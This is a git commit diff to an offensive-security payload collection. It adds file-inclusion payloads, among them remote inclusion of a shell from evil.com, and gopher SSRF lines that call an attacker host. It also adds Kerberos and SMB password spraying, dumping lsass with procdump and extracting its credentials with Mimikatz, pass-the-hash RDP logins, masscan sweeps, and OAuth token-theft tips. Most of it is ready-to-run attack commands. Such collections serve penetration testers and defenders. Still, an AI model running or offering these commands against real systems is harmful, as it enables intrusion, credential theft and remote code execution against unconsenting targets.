Masscan + AD password in description + ZSH revshell bugfix + Mimikatz lsass.dmp

2024-11-10 07:04:22 +00:00 · 2019-05-12 21:34:09 +02:00 · 2019-05-12 21:34:09 +02:00 · bab04f8587
commit bab04f8587
parent 765c615efe
11 changed files with 144 additions and 49 deletions
--- a/Inclusion/README.md
+++ b/Inclusion/README.md
@ -7,6 +7,10 @@
 ## Summary
 * [Basic LFI](#basic-lfi)
    * [Null byte](#null-byte)
    * [Double encoding](#double-encoding)
    * [Path truncation](#path-truncation)
    * [Filter bypass tricks](#filter-bypass-tricks)
 * [Basic RFI](#basic-rfi)
 * [LFI / RFI using wrappers](#lfi--rfi-using-wrappers)
  * [Wrapper php://filter](#wrapper-phpfilter)
@ -31,27 +35,30 @@ In the following examples we include the `/etc/passwd` file, check the `Director
 http://example.com/index.php?page=../../../etc/passwd
 ```
-Null byte
+### Null byte
 ```powershell
 http://example.com/index.php?page=../../../etc/passwd%00
 ```
-Double encoding
+### Double encoding
 ```powershell
 http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
 http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
 ```
-Path truncation
+### Path truncation
 On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away.
 ```powershell
 http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
 http://example.com/index.php?page=../../../etc/passwd/././././././././/././././././././././[ADD MORE] 
 http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
 ```
-Filter bypass tricks
+### Filter bypass tricks
 ```powershell
 http://example.com/index.php?page=....//....//etc/passwd
@ -65,13 +72,13 @@ http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C
 http://example.com/index.php?page=http://evil.com/shell.txt
 ```
-Null byte
+### Null byte
 ```powershell
 http://example.com/index.php?page=http://evil.com/shell.txt%00
 ```
-Double encoding
+### Double encoding
 ```powershell
 http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
@ -285,3 +292,4 @@ login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/s
 * [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse](https://blog.ripstech.com/2018/new-php-exploitation-technique/)
 * [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf)
 * [Local file inclusion mini list - Penetrate.io](https://penetrate.io/2014/09/25/local-file-inclusion-mini-list/)
 * [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
--- a/Resources/Active
+++ b/Resources/Active
@ -307,6 +307,8 @@ cme smb 10.10.0.202 -u username -p password --ntds vss
 enum4linux | grep -i desc
 There are 3-4 fields that seem to be common in most AD schemas: 
 UserPassword, UnixUserPassword, unicodePwd and msSFU30Password.
 Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID
 ```
 ### PassTheTicket Golden Tickets
@ -563,13 +565,21 @@ Alternatively you can use the Metasploit module
 ### Password spraying
-Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password. Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
+Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password. 
 Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
 ```powershell
 root@kali:~$ ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
 root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
 ```
 Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network.
 ```powershell
 crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
 ```
 Most of the time the best passwords to spray are :
 - Password1
--- a/Resources/Methodology_and_enumeration.md
+++ b/Resources/Methodology_and_enumeration.md
@ -8,6 +8,7 @@
  * The Harvester
 * [Active Recon](#active-recon)
  * Masscan
  * Nmap
  * Nmap Script
  * RPCClient
@ -47,6 +48,13 @@
 ## Active recon
 * Masscan
 ```powershell
 masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out
 masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000
 ```
 * Basic NMAP
  ```bash
--- a/Resources/Network
+++ b/Resources/Network
@ -1,38 +1,14 @@
 # Network Discovery
-## Netdiscover
+## Summary
-```powershell
+- [Nmap](#nmap)
-netdiscover -i eth0 -r 192.168.1.0/24
+- [Masscan](#masscan)
-Currently scanning: Finished!   |   Screen View: Unique Hosts
+- [Netdiscover](#netdiscover)
-
+- [Responder](#responder)
-20 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 876
+- [Bettercap](#bettercap)
-_____________________________________________________________________________
+- [Reconnoitre](#reconnoitre)
-IP            At MAC Address     Count     Len  MAC Vendor / Hostname
+- [References](#references)
 -----------------------------------------------------------------------------
 192.168.1.AA    68:AA:AA:AA:AA:AA     15     630  Sagemcom
 192.168.1.XX    52:XX:XX:XX:XX:XX      1      60  Unknown vendor
 192.168.1.YY    24:YY:YY:YY:YY:YY      1      60  QNAP Systems, Inc.
 192.168.1.ZZ    b8:ZZ:ZZ:ZZ:ZZ:ZZ      3     126  HUAWEI TECHNOLOGIES CO.,LTD  
 ```
 ## Responder
 ```powershell
 responder -I eth0 -A # see NBT-NS, BROWSER, LLMNR requests without responding.
 responder.py -I eth0 -wrf
 ```
 Alternatively you can use the [Windows version](https://github.com/lgandx/Responder-Windows)
 ## Bettercap
 ```powershell
 bettercap -X --proxy --proxy-https -T <target IP>
 # better cap in spoofing, discovery, sniffer
 # intercepting http and https requests,
 # targetting specific IP only
 ```
 ## Nmap
@ -121,6 +97,13 @@ Host script results:
 List Nmap scripts : ls /usr/share/nmap/scripts/
 ```
 ## Masscan
 ```powershell
 masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out
 masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000
 ```
 ## Reconnoitre
 Dependencies:
@ -135,6 +118,40 @@ python2.7 ./reconnoitre.py -t 192.168.1.2-252 -o ./results/ --pingsweep --hostna
 If you have a segfault with nbtscan, read the following quote.
 > Permission is denied on the broadcast address (.0) and it segfaults on the gateway (.1) - all other addresses seem fine here.So to mitigate the problem: nbtscan 192.168.0.2-255
 ## Netdiscover
 ```powershell
 netdiscover -i eth0 -r 192.168.1.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts
 20 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 876
 _____________________________________________________________________________
 IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.1.AA    68:AA:AA:AA:AA:AA     15     630  Sagemcom
 192.168.1.XX    52:XX:XX:XX:XX:XX      1      60  Unknown vendor
 192.168.1.YY    24:YY:YY:YY:YY:YY      1      60  QNAP Systems, Inc.
 192.168.1.ZZ    b8:ZZ:ZZ:ZZ:ZZ:ZZ      3     126  HUAWEI TECHNOLOGIES CO.,LTD  
 ```
 ## Responder
 ```powershell
 responder -I eth0 -A # see NBT-NS, BROWSER, LLMNR requests without responding.
 responder.py -I eth0 -wrf
 ```
 Alternatively you can use the [Windows version](https://github.com/lgandx/Responder-Windows)
 ## Bettercap
 ```powershell
 bettercap -X --proxy --proxy-https -T <target IP>
 # better cap in spoofing, discovery, sniffer
 # intercepting http and https requests,
 # targetting specific IP only
 ```
 ## References
 * [TODO](TODO)
--- a/Resources/Reverse
+++ b/Resources/Reverse
@ -234,13 +234,22 @@ Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new
 ## Spawn TTY Shell
 Access shortcuts, su, nano and autocomplete in a partially tty shell
 /!\ OhMyZSH might break this trick, a simple `sh` is recommended
 > The main problem here is that zsh doesn't handle the stty command the same way bash or sh does. [...] stty raw -echo; fg[...] If you try to execute this as two separated commands, as soon as the prompt appear for you to execute the fg command, your -echo command already lost its effect
 ```powershell
 ctrl+z
 echo $TERM && tput lines && tput cols
 # for bash
 stty raw -echo
 fg
 # for zsh
 stty raw -echo; fg
 reset
 export SHELL=bash
 export TERM=xterm-256color
--- a/Resources/Windows
+++ b/Resources/Windows
@ -26,6 +26,25 @@ mimikatz_command -f sekurlsa::logonPasswords full
 mimikatz_command -f sekurlsa::wdigest
 ```
 ## Mimikatz - Mini Dump
 Dump the lsass process.
 ```powershell
 C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
 net use Z: https://live.sysinternals.com
 Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
 ```
 Then load it inside Mimikatz.
 ```powershell
 mimikatz # sekurlsa::minidump lsass.dmp
 Switch to minidump
 mimikatz # sekurlsa::logonPasswords
 ```
 ## Mimikatz Golden ticket
 ```powershell
--- a/Resources/Windows
+++ b/Resources/Windows
@ -119,18 +119,20 @@ or with crackmapexec
 crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
 ```
-For Server 2012 R2, Win8.1+
+or with Metasploit
 ```powershell
 xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:192.168.1.12
 ```
 with Metasploit
 ```powershell
 run getgui -u admin -p 1234
 ```
 Then log in using xfreerdp 
 ```powershell
 xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+
 xfreerd /u:runner /v:10.0.0.1 # password will be asked
 ```
 ## Netuse (Windows)
 ```powershell
--- a/OAuth/README.md
+++ b/OAuth/README.md
@ -1,4 +1,20 @@
-# OAuth 2 - Common vulnerabilities
+# OAuth
 ## Summary
 - [Stealing OAuth Token via referer](#stealing-oauth-token-via-referer)
 - [Grabbing OAuth Token via redirect_uri](#grabbing-oauth-token-via-redirect---uri)
 - [Executing XSS via redirect_uri](#executing-xss-via-redirect---uri)
 - [OAuth private key disclosure](#oauth-private-key-disclosure)
 - [Authorization Code Rule Violation](#authorization-code-rule-violation)
 - [Cross-Site Request Forgery](#cross-site-request-forgery)
 - [References](#references)
 ## Stealing OAuth Token via referer
 From [@abugzlife1](https://twitter.com/abugzlife1/status/1125663944272748544) tweet.
 > Do you have HTML injection but can't get XSS? Are there any OAuth implementations on the site? If so, setup an img tag to your server and see if there's a way to get the victim there (redirect, etc.) after login to steal OAuth tokens via referer 
 ## Grabbing OAuth Token via redirect_uri
--- a/README.md
+++ b/README.md
@ -2,7 +2,7 @@
 A list of useful payloads and bypasses for Web Application Security.
 Feel free to improve with your payloads and techniques !
-I <3 pull requests :)
+I :heart: pull requests :)
 You can also contribute with a beer IRL or with `buymeacoffee.com`
--- a/Forgery/README.md
+++ b/Forgery/README.md
@ -277,6 +277,13 @@ You didn't say the magic word !
 QUIT
 ```
 #### Gopher HTTP
 ```powershell
 gopher://<proxyserver>:8080/_GET http://<attacker:80>/x HTTP/1.1%0A%0A
 gopher://<proxyserver>:8080/_POST%20http://<attacker>:80/x%20HTTP/1.1%0ACookie:%20eatme%0A%0AI+am+a+post+body
 ```
 #### Gopher SMTP - Back connect to 1337
 ```php
--- a/Injection/README.md
+++ b/Injection/README.md
@ -930,7 +930,6 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
 - [Three Stored XSS in Facebook](http://www.breaksec.com/?p=6129) by Nirgoldshlager 
 - [Using a Braun Shaver to Bypass XSS Audit and WAF](https://blog.bugcrowd.com/guest-blog-using-a-braun-shaver-to-bypass-xss-audit-and-waf-by-frans-rosen-detectify) by Frans Rosen  
 - [An XSS on Facebook via PNGs & Wonky Content Types](https://whitton.io/articles/xss-on-facebook-via-png-content-types/) by Jack Whitton
  - he is able to make stored XSS from a irrelevant domain to main facebook domain 
 - [Stored XSS in *.ebay.com](https://whitton.io/archive/persistent-xss-on-myworld-ebay-com/) by Jack Whitton
 - [Complicated, Best Report of Google XSS](https://sites.google.com/site/bughunteruniversity/best-reports/account-recovery-xss) by Ramzes
 - [Tricky Html Injection and Possible XSS in sms-be-vip.twitter.com](https://hackerone.com/reports/150179) by secgeek